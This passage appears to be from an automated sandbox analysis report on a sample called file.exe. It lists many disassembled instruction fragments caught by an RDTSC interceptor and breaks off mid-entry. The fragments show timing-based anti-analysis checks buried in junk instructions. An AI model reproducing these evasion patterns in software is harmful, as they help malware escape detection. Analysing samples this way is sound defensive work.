                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2014E second address: 4A2019E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 mov esi, ebx 0x00000014 popad 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6254D230C5h 0x0000001f adc si, 8B86h 0x00000024 jmp 00007F6254D230C1h 0x00000029 popfd 0x0000002a popad 0x0000002b push dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2019E second address: 4A201A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A201A2 second address: 4A201B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A201B5 second address: 4A201CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873F4h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A201CD second address: 4A201D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40CCD second address: 4A40CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40CD4 second address: 4A40D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d mov bh, ch 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 call 00007F6254D230BEh 0x00000019 mov ebx, esi 0x0000001b pop eax 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6254D230C8h 0x00000025 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40921 second address: 4A40925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40925 second address: 4A4092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4092B second address: 4A40931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40931 second address: 4A40935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40935 second address: 4A40962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edx 0x0000000f pushfd 0x00000010 jmp 00007F6254B873EAh 0x00000015 xor esi, 4E8EC528h 0x0000001b jmp 00007F6254B873EBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40962 second address: 4A40968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40968 second address: 4A40991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6254B873F5h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40833 second address: 4A40898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0AF5387Ah 0x00000008 pushfd 0x00000009 jmp 00007F6254D230BBh 0x0000000e and ah, 0000001Eh 0x00000011 jmp 00007F6254D230C9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F6254D230C1h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F6254D230BEh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6254D230BAh 0x00000031 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40898 second address: 4A4089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4089E second address: 4A408AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254D230BDh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80EFA second address: 4A80F4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e pushfd 0x0000000f jmp 00007F6254B873F1h 0x00000014 sub ax, 5656h 0x00000019 jmp 00007F6254B873F1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80F4B second address: 4A80F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80F4F second address: 4A80F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A603F0 second address: 4A603FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A603FF second address: 4A60405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60405 second address: 4A60409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60409 second address: 4A60443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F6254B873F6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov cx, di 0x00000016 mov ebx, 0AB62C90h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60443 second address: 4A60447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60447 second address: 4A6044D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6044D second address: 4A60467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254D230C6h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60467 second address: 4A6046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6046B second address: 4A604A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6254D230C7h 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6254D230C5h 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A406E7 second address: 4A406ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A406ED second address: 4A406F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A406F1 second address: 4A40717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6254B873F0h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40717 second address: 4A4071D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4071D second address: 4A40769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 9Ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6254B873F2h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 pushfd 0x00000016 jmp 00007F6254B873F6h 0x0000001b or esi, 432F5178h 0x00000021 jmp 00007F6254B873EBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40769 second address: 4A407CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6254D230BFh 0x00000009 sbb eax, 49F2C93Eh 0x0000000f jmp 00007F6254D230C9h 0x00000014 popfd 0x00000015 call 00007F6254D230C0h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 call 00007F6254D230C7h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A407CC second address: 4A407E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ebx, 5855420Ah 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6254B873ECh 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80674 second address: 4A80678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80678 second address: 4A8067E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8067E second address: 4A806CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6254D230BBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6254D230C6h 0x00000015 mov ebp, esp 0x00000017 jmp 00007F6254D230C0h 0x0000001c xchg eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A806CB second address: 4A80704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6254B873F3h 0x0000000a or ecx, 6FE7A87Eh 0x00000010 jmp 00007F6254B873F9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8089C second address: 4A808EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F6254D230C5h 0x0000000b add cx, C486h 0x00000010 jmp 00007F6254D230C1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6254D230C8h 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A808EE second address: 4A808F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A808F2 second address: 4A808F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A808F8 second address: 4A808FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A808FE second address: 4A80952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6254D230BCh 0x00000014 pushfd 0x00000015 jmp 00007F6254D230C2h 0x0000001a add ecx, 114DF718h 0x00000020 jmp 00007F6254D230BBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80952 second address: 4A8097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2263A43Ah 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F6254B873EDh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6254B873EDh 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8097E second address: 4A80984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3001F second address: 4A30025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30025 second address: 4A3002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3002B second address: 4A3002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3002F second address: 4A3005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6254D230C2h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6254D230BEh 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3005B second address: 4A30093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, C834h 0x00000007 pushfd 0x00000008 jmp 00007F6254B873EDh 0x0000000d or ax, D7F6h 0x00000012 jmp 00007F6254B873F1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx edx, ax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30093 second address: 4A30098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30098 second address: 4A300BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6254B873F0h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300BD second address: 4A300C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300C1 second address: 4A300C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300C7 second address: 4A300CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300CD second address: 4A30114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F6254B873ECh 0x00000017 jmp 00007F6254B873F5h 0x0000001c popfd 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30114 second address: 4A3012E instructions: 0x00000000 rdtsc 0x00000002 mov ax, CF77h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6254D230BBh 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3012E second address: 4A30146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873F4h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30146 second address: 4A30161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b pushad 0x0000000c call 00007F6254D230BDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30161 second address: 4A301B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 jmp 00007F6254B873F8h 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F6254B873F1h 0x00000013 push ecx 0x00000014 jmp 00007F6254B873F7h 0x00000019 pop eax 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A301B4 second address: 4A301B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A301B8 second address: 4A301C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A301C8 second address: 4A30233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov ax, 6AA9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6254D230C2h 0x00000017 sbb ch, 00000078h 0x0000001a jmp 00007F6254D230BBh 0x0000001f popfd 0x00000020 call 00007F6254D230C8h 0x00000025 mov ah, 64h 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6254D230C9h 0x00000031 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30233 second address: 4A3030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6254B873F7h 0x00000009 add eax, 7AA848FEh 0x0000000f jmp 00007F6254B873F9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F6254B873F0h 0x0000001b jmp 00007F6254B873F5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 jmp 00007F6254B873F1h 0x0000002a xchg eax, esi 0x0000002b jmp 00007F6254B873EEh 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 jmp 00007F6254B873F0h 0x00000038 xchg eax, edi 0x00000039 pushad 0x0000003a mov al, 8Eh 0x0000003c pushfd 0x0000003d jmp 00007F6254B873F3h 0x00000042 adc ecx, 67ACBE7Eh 0x00000048 jmp 00007F6254B873F9h 0x0000004d popfd 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3030C second address: 4A30310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30310 second address: 4A30314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30314 second address: 4A3031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3031A second address: 4A30343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6254B873EDh 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30343 second address: 4A30349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30349 second address: 4A3034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3034D second address: 4A303E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F6254D230BFh 0x0000000f je 00007F62C7221365h 0x00000015 pushad 0x00000016 call 00007F6254D230C4h 0x0000001b jmp 00007F6254D230C2h 0x00000020 pop eax 0x00000021 mov bx, C4D6h 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d pushad 0x0000002e jmp 00007F6254D230C3h 0x00000033 mov ax, 513Fh 0x00000037 popad 0x00000038 je 00007F62C7221328h 0x0000003e jmp 00007F6254D230C2h 0x00000043 mov edx, dword ptr [esi+44h] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F6254D230BAh 0x0000004f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A303E2 second address: 4A303E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A303E6 second address: 4A303EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A303EC second address: 4A303FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873EDh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A303FD second address: 4A30401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30401 second address: 4A3043B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F6254B873EDh 0x00000010 test edx, 61000000h 0x00000016 jmp 00007F6254B873EEh 0x0000001b jne 00007F62C7085641h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov si, BEDFh 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3043B second address: 4A30441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A206ED second address: 4A207B7 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b pushfd 0x0000000c jmp 00007F6254B873F5h 0x00000011 sub esi, 52A50516h 0x00000017 jmp 00007F6254B873F1h 0x0000001c popfd 0x0000001d pop eax 0x0000001e mov si, dx 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 jmp 00007F6254B873F3h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d jmp 00007F6254B873F4h 0x00000032 jmp 00007F6254B873F2h 0x00000037 popad 0x00000038 and esp, FFFFFFF8h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F6254B873EDh 0x00000044 and cl, 00000036h 0x00000047 jmp 00007F6254B873F1h 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007F6254B873F0h 0x00000053 xor si, 0058h 0x00000058 jmp 